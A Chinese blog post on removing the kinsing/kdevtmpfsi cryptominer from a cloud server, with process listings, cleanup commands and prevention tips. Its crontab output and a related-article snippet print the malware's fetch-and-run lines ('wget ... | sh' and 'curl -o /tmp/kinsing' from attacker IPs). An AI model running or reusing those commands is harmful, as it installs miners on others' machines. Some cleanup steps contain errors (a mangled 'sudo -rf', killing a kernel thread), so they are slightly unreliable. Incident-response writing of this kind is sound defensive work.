云服务器清理挖矿进程

最新推荐文章于 2023-06-24 10:45:00 发布
最新推荐文章于 2023-06-24 10:45:00 发布
阅读量1.1k 收藏
点赞数
分类专栏: Linux 文章标签: linux 运维 DDOS 安全组 清理挖矿进程
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/maoyuanming0806/article/details/105688357
版权

清理挖矿程序

问题复现

没有启动什么占用资源的进程,但是4G内存直接快满了,cpu也高,基本可以判断是有挖矿程序在跑

如下情况

[mym@bigdata01 software]$ free -h
              total        used        free      shared  buff/cache   available
Mem:           3.9G        2.5G        168M        217M        1.2G        924M
Swap:            0B          0B          0B
[mym@bigdata01 software]$ jps
29218 Jps
[mym@bigdata01 software]$ top
top - 17:19:17 up 30 days, 23:51,  1 user,  load average: 12.61, 13.41, 13.81
Tasks: 903 total,   2 running, 130 sleeping,   0 stopped, 771 zombie
%Cpu(s): 99.2 us,  0.8 sy,  0.0 ni,  0.0 id,  0.0 wa,  0.0 hi,  0.0 si,  0.0 st
KiB Mem :  4045104 total,   143448 free,  2645876 used,  1255780 buff/cache
KiB Swap:        0 total,        0 free,        0 used.   945508 avail Mem 

  PID USER      PR  NI    VIRT    RES    SHR S  %CPU %MEM     TIME+ COMMAND                               
17154 mym       20   0  306132 269120      8 S  36.5  6.7 143:19.32 bash64                                
18993 mym       20   0  306132 269188      8 S  36.2  6.7 142:32.41 bash64                                
26095 mym       20   0  306136 269192      8 S  36.2  6.7 135:38.88 bash64                                
15594 mym       20   0  306136 269316      0 S  34.9  6.7 218:41.81 bash64                                
25774 mym       20   0  306136 269192      8 S  34.9  6.7 135:54.86 bash64                                
11389 mym       20   0  515392 265248    304 S  17.8  6.6 100:56.52 kdevtmpfsi                            
 1149 root      39  19  301424   9116   1384 S   0.7  0.2  25:36.01 bcm-si                                
 5024 mym       20   0 2279520 296732      0 S   0.7  7.3  54:55.15 java                                  
15399 root      20   0 1399044  36028   4512 S   0.7  0.9 308:53.32 hosteye                               
 4647 mym       20   0 2084548 175492   4028 S   0.3  4.3  15:24.83 java                                  
 5207 mym       20   0 2128716 245724   3068 S   0.3  6.1  28:51.30 java                                  
10684 mym       20   0     256     96      0 S   0.3  0.0   0:18.55 124d1142x41u2ua                       
31075 mym       20   0  162784   3108   1580 R   0.3  0.1   0:00.27 top                                   
    1 root      20   0  125628   2980   1452 S   0.0  0.1   9:48.28 systemd                               
    2 root      20   0       0      0      0 S   0.0  0.0   0:00.11 kthreadd                              
    4 root       0 -20       0      0      0 S   0.0  0.0   0:00.00 kworker/0:0H                          
    6 root      20   0       0      0      0 S   0.0  0.0   5:11.03 ksoftirqd/0                           
    7 root      rt   0       0      0      0 S   0.0  0.0   0:10.89 migration/0                           
    8 root      20   0       0      0      0 S   0.0  0.0   0:00.00 rcu_bh                                
    9 root      20   0       0      0      0 S   0.0  0.0   7:38.80 rcu_sched                             
   10 root       0 -20       0      0      0 S   0.0  0.0   0:00.00 lru-add-drain                         
   11 root      rt   0       0      0      0 S   0.0  0.0   0:13.77 watchdog/0                            
   12 root      rt   0       0      0      0 S   0.0  0.0   0:10.37 watchdog/1                            
   13 root      rt   0       0      0      0 S   0.0  0.0   0:09.20 migration/1                           
   14 root      20   0       0      0      0 S   0.0  0.0  43:35.45 ksoftirqd/1                           
   16 root       0 -20       0      0      0 S   0.0  0.0   0:00.00 kworker/1:0H                          
   18 root      20   0       0      0      0 S   0.0  0.0   0:00.00 kdevtmpfs                             
   19 root       0 -20       0      0      0 S   0.0  0.0   0:00.00 netns                                 
   20 root      20   0       0      0      0 S   0.0  0.0   0:02.20 khungtaskd                            
   21 root       0 -20       0      0      0 S   0.0  0.0   0:00.00 writeback

一堆进程,其中kdevtmpfsi、kinsing等是挖矿程序进程

[mym@bigdata01 software]$ ps -aux | grep kinsing
mym      31234  0.0  0.6 119428 24528 ?        Sl   11:00   0:03 /var/tmp/kinsing
mym      32336  0.0  0.0 112708   960 pts/0    R+   17:21   0:00 grep --color=auto kinsing
[mym@bigdata01 software]$ ps -aux | grep kdevtmp
root        18  0.0  0.0      0     0 ?        S    Mar22   0:00 [kdevtmpfs]
mym      11389 21.6  6.5 515392 265248 ?       Ssl  09:32 101:18 /tmp/kdevtmpfsi
mym      32411  0.0  0.0 112712   960 pts/0    S+   17:21   0:00 grep --color=auto kdevtmp

自己也没有任何定时任务,然后查看crontab,也有挖矿的定时任务在,所以也要清理这里

[mym@bigdata01 software]$ crontab -l
*/1 * * * * export DISPLAY=:0 && /home/mym/.tmp00/bash >/dev/null 2>&1
* * * * * wget -q -O - http://195.3.146.118/h2.sh | sh > /dev/null 2>&1

清理

删除挖矿程序相关进程

[mym@bigdata01 software]$ kill -9 31234 18 11389

删除定时任务

[mym@bigdata01 software]$ crontab -r

删除进程的临时文件

[mym@bigdata01 software]$ cd /tmp
[mym@bigdata01 tmp]$ ls
hsperfdata_mym  hsperfdata_root  kdevtmpfsi  linux.lock
[mym@bigdata01 tmp]$ sudo rm -rf kdevtmpfsi
[mym@bigdata01 tmp]$ ls /var/tmp
abrt  for  kinsing  yum-mym-7oRfv9
[mym@bigdata01 tmp]$ sudo -rf /var/tmp/kinsing

再次全局查询下有没有遗漏

[mym@bigdata01 tmp]$ sudo find / -name kinsing
/var/tmp/kinsing
[mym@bigdata01 tmp]$ sudo find / -name kdevtmpfsi
/tmp/kdevtmpfsi
[mym@bigdata01 tmp]$ rm -rf /var/tmp/kinsing
[mym@bigdata01 tmp]$ rm -rf /var/tmp/kdevtmpfsi

预防

  • 预防方式就是注意配置安全组,尽可能的少入站,尽可能的安全开放端口。或者弄个跳板机
  • 使用密钥进行登录
  • 默认端口都改掉,比如ssh的22,mysql的3306,redis的6379等
  • 能设置密码的或者权限的都加上。虽然麻烦,但是没办法尽可能安全
小明同学YYDS
关注
专栏目录
阿里云服务器中了挖矿程序应该如何清除
m0_65455195的博客
12-17 5670
阿里云服务器中了挖矿程序如何处理?云安全中心安全告警短信提醒云服务器中了挖矿程序怎么处理?护云盾来详细说下阿里云服务器挖矿程序的解决方法,一种是使用云安全中心自动处理,另一种方式是自行手动清除。 阿里云服务器挖矿程序解决方法 如果你的阿里云服务器中了挖矿程序,你有两种处理方式,一种是使用云安全中心自动清理,另一种是手动清除: 云安全中心处理挖矿程序 1、登录到云安全中心控制台 2、左侧栏,选择“威胁检测”--“安全告警处理” 在安全告警处理列表中,找到挖矿程序,然后点“处理” 云安全中心安
清理服务器中的挖矿进程kswapd0 & tsm
MaggieTang0622的博客
11-25 1131
挖矿进程kswapd0&tsm清理
记一次被注入挖矿程序kdevtmpfi解决记录
但行好事,莫问前程
02-05 4917
前言 发现自己服务器资源使用异常,cpu使用率100%,内存使用也很多,且有陌生的进程。那很有可能是被入侵植入了挖矿程序 解决问题 遇到这种问题切忌惊慌失措,一般挖矿程序除了占用服务资源不会有其他危害 1. 切断来源 一般被侵入的话,服务器上的计划任务会被修改,会有一个进程一直在检测程序是否存在,如果只kill进程删除文件的话会发现过不了一会就会死灰复燃,所以斩草除根,先把去外界不安全的连接关掉。 被修改的计划任务如curl -o /tmp/kinsing http://45.137.155.5.
xmrig挖矿病毒导致Postgresql数据库掉线
kite99的博客
04-18 1331
xmrig挖矿病毒导致Postgresql数据库断线。清除病毒数据库工作正常。
腾讯云服务器遭遇kdevtmpfsi挖矿病毒
sunydayshine的博客
06-02 1215
登录到服务器后开始检查数据库数据,发现并没有被破坏,然后开始清理病毒,先使用top命令看到这个进程,然后将其kill掉,然后再去/etc/文件下找到了异常文件libsystem.so和kinsing,将其删除。一看就是在偷偷下载不怀好意的脚本文件,确定了这个ip不是我们机器,然后果断删除这个定时任务,然后又重复杀掉kdevtmpfsi进程,删除相关文件夹,机器终于恢复了正常。没一会儿的功夫的,监控发现cpu又打满了100%,然后我又开始重复的步骤,杀进程删文件,看来这个病毒并没有这么容易解决。
记一次Linux被入侵,服务器变“矿机”全过程
yeluoxiang的专栏
06-13 4728
“周一早上刚到办公室,就听到同事说有一台服务器登陆不上了,我也没放在心上,继续边吃早点,边看币价是不是又跌了。不一会运维的同事也到了,气喘吁吁的说:我们有台服务器被阿里云...
再谈shell之“>/dev/null 2>&1”
08-06 464
今天在自己的一个技术群中又被问道了这么一个问题,于是又通俗的解释了一下,做个记录,大家看看解释是否清楚! shell中可能经常能看到:>/dev/null 2>&1 命令的结果可以通过%>的形式来定义输出 分解这个合:“>/dev/null 2>&1” 为五部分。 1:> 代表重定向到哪里,例如:echo "123" > /home/123.txt 2:/dev/nul
我的服务器被挖矿了,原因居然是...
最新发布
qq_44005305的博客
06-24 1124
比特币系统每隔一段时间就会在节点上生成一个随机代码,互联网中的所有设备都可以寻找这个代码,谁先找到就能获得奖励。而寻找代码的过程,就是挖矿。设备通过计算来筛选出符合条件的随机代码,每找到一个随机代码往往需要上万亿次的哈希运算,CPU通常会被顶到100%。为了降低成本,黑客往往会通过入侵的方式,控制别人的计算机来帮自己挖矿
阿里云服务器中招挖矿病毒XMrig miner解决方法
热门推荐
Starbme_2018的博客
03-18 1万+
今天阿里云的项目经理给我打电话问我的服务器是否没有使用计划,确实自从上次中毒后就没再使用。今天登录阿里云服务器 WindowsServer2012 远程桌面,发现XMrig miner.exe cpu进程占用高达80%以上,cpu总占用达到99%,查了下时间是昨天十点开始进程占用率奇高的,因此我知道头痛的事情又来了:挖矿病毒又回来了。。。 查了一下告警信息,如下: 该告警由如下引擎检测发现:...
Linux挖矿病毒清理流程
ouxx2009的专栏
03-14 1万+
Linux挖矿病毒清理流程 1.前言: 根据阿里云快讯病毒公布: Redis RCE导致h2Miner蠕虫病毒,其利用Redis未授权或弱口令作为入口,使用主从同步的方式从恶意服务器上同步恶意module,之后在目标机器上加载此恶意module并执行恶意指令。在以往常见的攻击者或蠕虫中,其大多都沿用登陆redis后写入定时任务或写ssh key的方式进行入侵,这种方式受权限与系统类型影响并不一定能够成功。而此次使用redis加载module的攻击方式,可以直接执行任意指令或拿到shell交互环境,危害
服务器被黑客用来挖矿?怎么办?
JAVA88866的博客
05-14 2410
哈喽,大家好,我是老表~ 昨天下午一个朋友和我说,他的服务器被阿里云监测出来在挖矿,然后阿里云官方把服务器给关停了。 不用急,这个时候最简单的方法是在阿里云里提一个工单,反馈相关问题。 解禁服务器 要解决问题、排查删除挖矿程序,首先我们需要解禁服务器,登录阿里云官方平台后,依次点击控制台->个人头像->安全管控进入相关页面。 在处罚列表,我们可以看到相关处罚记录,点击解除封禁后即可正常进入服务器了。 会有提示,需要在解禁后三日内找到挖矿程序,并删除,否则官...
挖矿病毒 kdevtmpfsi 的处理办法
weixin_42329623的博客
04-02 1655
挖矿病毒 kdevtmpfsi 的查找与处理办法
清除挖矿病毒 kdevtmpfsi记录
第一天
05-17 395
某日登录服务器,查看到cpu使用异常 负载很高 查看下cpu进程使用情况 kdevtmpfsi 这个进程使用异常 28243 polkitd 20 0 2915868 2.3g 0 S 193.0 29.9 673812:14 kdevtmpfsi ps aux 查看下这个进程的路径 kill -9 28243 删除进程 查看是否存在定时任务 https://blog.csdn.net/qq_45186545/article/details/103853601 http
记一次解决kdevtmpfsi挖矿病毒
u010737670的博客
05-10 1029
ikdevtmpfsi病毒不断出现的解决历程。。。
记录一次挖矿病毒kthreaddk和rcu_bj,导致CPU飙高处理
Mr_chenchen的博客
03-01 2800
kthreaddk和rcu_bj进程,cpu飙高 占用一般cpu或者50-70%
阿里云挖矿病毒解决
weixin_39766667的博客
02-20 2421
有一次,我们在阿里上的服务器收到这样的短信。【阿里云】尊敬的xxxxxx:经检测您的阿里云服务(ECS实例)xxxxxxxx存在挖矿活动。根据相关法规、政策的规定及监管部门的要求,请您于2023-02-27 00时前完成挖矿问题整改,否则您的服务将被关停,详情请查看邮件或阿里云站内消息通知。若您有其他问题,可登陆阿里云官网在线咨询这就是中了挖矿病毒,如何处理它?
树莓派vnc(tvnviewer)远程控制退出全屏(Ctrl+Alt+Shift+F)
净无邪博客
12-25 7736
用vnc(tvnviewer)远程树莓派屏幕时,显示全屏,发现退出(关闭)不了全屏。经过查找,发现想要关闭全屏,需要按如下快捷键合: Ctrl+Alt+Shift+F     参考内容: https://jingyan.baidu.com/article/86112f1396100227379787a3.html(参考:退出快捷键Ctrl+Alt+Shift+F)...
在阿里云里面服务器怎么样可以更好的链接数据库
m0_64068722的博客
11-26 681
环境:阿里云ubuntu服务器 阿里云RDS数据库 问题:如何在阿里云服务器的终端使用shell命令连接RDS云数据库 解决方法: 1.阿里云服务器安装MySQL sudo apt-get install mysql-server 如果出现unable to locate package mysql-server 先使用语句 sudo apt-get update 2.连接阿里云数据库 在阿里云服务器终端 mysql -u root -h RDS数据库连接地址 -p 按提示输入密..
MongoDB系列之-客户端工具连接MongoDB远程服务
weinichendian的博客
01-09 2571
一.前言 俗话说,千里之行始于足下,开始学MongoDB技术了,博主没有从原理开始讲解MongoDB,而是从实际的代码开始,博主会在代码中讲解MongoDB的原理知识,碰到的问题都会有记录,后面也会拓展一下,MongoDB的适用场景。让大家知道什么样的场景下可以使用MongoDB,来吧开干。 二.新建微服务模块 这个模块专门用来探讨MongoDB的使用,使用是微服务架构。来来来,撸起来。 首先,要...
云服务器挖矿了需要重装系统吗
06-10
一般情况下,云服务器挖矿后最好的解决办法是重装系统。因为挖矿病毒通常会在系统中留下一些后门或者恶意程序,这些程序可能会继续在后台运行,重新感染服务器或者窃取敏感信息。所以,为了确保服务器安全,建议重装系统,并且重新设置密码和安装所需的软件和服务。在重装系统前,应该备份重要数据和文件,以免数据丢失。同时,应该对服务器的防火墙、访问控制、日志监控等方面进行加固,减少被攻击的风险。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值